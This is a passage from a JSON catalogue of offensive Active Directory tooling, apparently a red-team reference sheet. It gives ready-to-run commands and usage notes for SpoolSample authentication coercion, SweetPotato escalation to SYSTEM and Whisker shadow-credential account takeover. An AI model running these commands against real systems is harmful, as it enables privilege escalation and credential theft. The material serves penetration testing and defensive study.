   4716     "description": "SpoolSample.exe is the original Windows C# implementation of the PrinterBug (MS-RPRN) coercion technique. Run from an existing foothold on a domain-joined Windows host, it calls the print spooler's change-notification RPC on the target to force that target's machine account to authenticate back to a capture server, which is typically an ntlmrelayx or Responder listener. It is the on-host counterpart to printerbug.py and useful when operating entirely from a compromised Windows box under an existing user context. Requires the Print Spooler service to be running on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tCapture Server IP: 10.10.10.2",
   4717     "mitre": [],
   4718     "requires": [
   4719       "Shell"
   4720     ],
   4721     "services": [
   4722       "RPC",
   4723       "NTLM"
   4724     ],
   4725     "references": [
   4726       "https://github.com/leechristensen/SpoolSample",
   4727       "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"
   4728     ],
   4729     "added": true
   4730   },
   4731   {
   4732     "id": "wadcoms:SweetPotato-SeImpersonate",
   4733     "toolId": "wadcoms:SweetPotato",
   4734     "toolName": "SweetPotato",
   4735     "name": "SweetPotato-SeImpersonate",
   4736     "source": "DAEMON",
   4737     "platform": [
   4738       "Windows",
   4739       "ActiveDirectory"
   4740     ],
   4741     "capability": [
   4742       "Privilege Escalation",
   4743       "Execution"
   4744     ],
   4745     "nativeCategory": [
   4746       "PrivEsc",
   4747       "Exploitation"
   4748     ],
   4749     "command": "# -e selects the coercion primitive (EfsRpc | DCOM | WinRM | PrintSpoofer | PetitPotam)\nSweetPotato.exe -p C:\\Windows\\System32\\cmd.exe -a \"/c whoami\" -e EfsRpc",
   4750     "description": "SweetPotato bundles several SYSTEM-coercion primitives (EfsRpc, DCOM/RoguePotato-style OXID, PrintSpoofer, PetitPotam, WinRM) behind one binary, selected with -e, so you can fall back to whichever named-pipe or DCOM coercion the host permits. It captures the coerced SYSTEM token and launches the program in -p with the arguments in -a. Handy on IIS/MSSQL service accounts when you want to try multiple potato techniques without swapping tools. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tExploit mode: EfsRpc",
   4751     "mitre": [],
   4752     "requires": [
   4753       "Shell"
   4754     ],
   4755     "services": [
   4756       "DCOM",
   4757       "RPC"
   4758     ],
   4759     "references": [
   4760       "https://github.com/CCob/SweetPotato",
   4761       "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"
   4762     ],
   4763     "added": true
   4764   },
   4765   {
   4766     "id": "wadcoms:Whisker-ShadowCredentials",
   4767     "toolId": "wadcoms:Whisker",
   4768     "toolName": "Whisker",
   4769     "name": "Whisker-ShadowCredentials",
   4770     "source": "DAEMON",
   4771     "platform": [
   4772       "Windows",
   4773       "ActiveDirectory"
   4774     ],
   4775     "capability": [
   4776       "Privilege Escalation",
   4777       "Persistence",
   4778       "Credential Access"
   4779     ],
   4780     "nativeCategory": [
   4781       "PrivEsc",
   4782       "Persistence",
   4783       "Credential Access"
   4784     ],
   4785     "command": "# Add a shadow credential to the target and get the follow-up Rubeus command\nWhisker.exe add /target:victim /domain:test.local /dc:dc.test.local",
   4786     "description": "Whisker is a C# tool that manipulates the msDS-KeyCredentialLink attribute to perform the Shadow Credentials attack from a Windows host. `Whisker.exe add` generates a certificate, adds the corresponding key credential to the target object, and prints a ready-to-run Rubeus asktgt PKINIT command to authenticate as the victim and recover its NT hash. It requires GenericWrite/GenericAll over the target and a DC that supports PKINIT (an enterprise CA present). Stealthier than a password reset because the account's password is unchanged.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDomain Controller: dc.test.local\n\n\tTarget account: victim",
   4787     "mitre": [],
   4788     "requires": [
   4789       "Shell"
   4790     ],
   4791     "services": [
   4792       "LDAP",
   4793       "ADCS"
   4794     ],
   4795     "references": [
   4796       "https://github.com/eladshamir/Whisker",
   4797       "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials",
   4798       "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"
   4799     ],
   4800     "added": true
   4801   }
   4802 ]